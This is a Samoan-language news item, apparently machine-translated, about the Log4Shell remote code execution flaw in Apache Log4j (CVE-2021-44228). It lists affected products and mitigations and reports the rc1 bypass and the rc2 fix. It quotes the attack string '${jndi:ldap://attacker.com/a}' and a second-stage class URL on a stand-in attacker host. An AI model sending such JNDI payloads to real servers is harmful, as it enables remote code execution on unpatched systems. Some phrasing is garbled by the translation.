I totonu o Apache Log4j, o se taʻiala lauiloa mo le faʻatulagaina o le faʻapipiʻiina i totonu o Java talosaga, o se faʻafitauli matuia ua faʻaalia e mafai ai ona faʻatinoina le tulafono faʻapitoa pe a tusia se tau faʻapitoa i le "{jndi:URL}" faʻapipiʻi i le ogalaau. O le osofaʻiga e mafai ona faʻatinoina i luga o Java talosaga e faʻamaumau tau na maua mai i fafo, mo se faʻataʻitaʻiga, pe a faʻaalia faʻafitauli faʻafitauli i feʻau sese.
O loʻo maitauina e toetoe lava o poloketi uma e faʻaaogaina faʻavae e pei o Apache Struts, Apache Solr, Apache Druid poʻo Apache Flink e aʻafia i le faʻafitauli, e aofia ai Steam, Apple iCloud, Minecraft tagata faʻatau ma sapalai. O loʻo faʻamoemoeina o le faʻafitauli e mafai ona oʻo atu ai i se galu o osofaʻiga tetele i luga o talosaga faʻapisinisi, toe fai le talaʻaga o faʻafitauli ogaoga i le Apache Struts framework, lea, e tusa ai ma se faʻatusatusaga faʻatusatusa, o loʻo faʻaaogaina i luga o upega tafaʻilagi e 65% o Fortune. Kamupani 100. E aofia ai taumafaiga e suʻesuʻe le fesoʻotaʻiga mo faiga faʻaletonu.
O le faʻafitauli ua faʻatuputeleina i le mea moni e faapea o se galuega faʻaogaina ua uma ona faʻasalalau, ae o faʻaleleia mo lala mautu e leʻi tuʻufaʻatasia. E le'i tu'uina atu le fa'ailoga CVE. O le faʻaoga e naʻo le aofia i le log4j-2.15.0-rc1 suʻega lala. I le avea o se fofo mo le polokaina o le vaivai, e fautuaina e seti le log4j2.formatMsgNoLookups parakalafa i le moni.
O le fa'afitauli na mafua mai i le mea moni e lagolagoina e le log4j le fa'aogaina o matapulepule fa'apitoa "{}" i laina o lo'o tu'uina atu i le ogalaau, lea e mafai ai ona fa'atino fesili a le JNDI (Java Naming and Directory Interface). O le osofaʻiga e oso i lalo i le pasiina o se manoa ma le sui "${jndi:ldap://attacker.com/a}", i luga o le gaioiga lea o le a tuʻuina atu e le log4j se talosaga LDAP mo le ala i le vasega Java i le server attacker.com . O le ala na toe faʻafoʻi mai e le tagata osofaʻi (mo se faʻataʻitaʻiga, http://second-stage.attacker.com/Exploit.class) o le a utaina ma faʻatinoina i le tulaga o le faagasologa o loʻo i ai nei, lea e mafai ai e le tagata osofaʻi ona faʻatino tulafono faʻamaonia i luga o le faiga fa'atasi ai ma aia tatau o le talosaga o lo'o iai nei.
Fa'aopoopo 1: O le fa'aletonu ua tu'uina atu i ai le fa'amatalaga CVE-2021-44228.
Fa'aopoopo 2: Ua fa'ailoa mai se auala e fa'aalo ai le puipuiga fa'aopoopo e ala i le fa'amalolo log4j-2.15.0-rc1. O se faʻafouga fou, log4j-2.15.0-rc2, ua tuʻuina atu faʻatasi ai ma le puipuiga atoatoa mai le faʻafitauli. O loʻo faʻamaonia e le code le suiga e fesoʻotaʻi ma le leai o se faʻamutaina faʻafuaseʻi i le tulaga o le faʻaogaina o le JNDI URL ua le saʻo.
puna: opennet.ru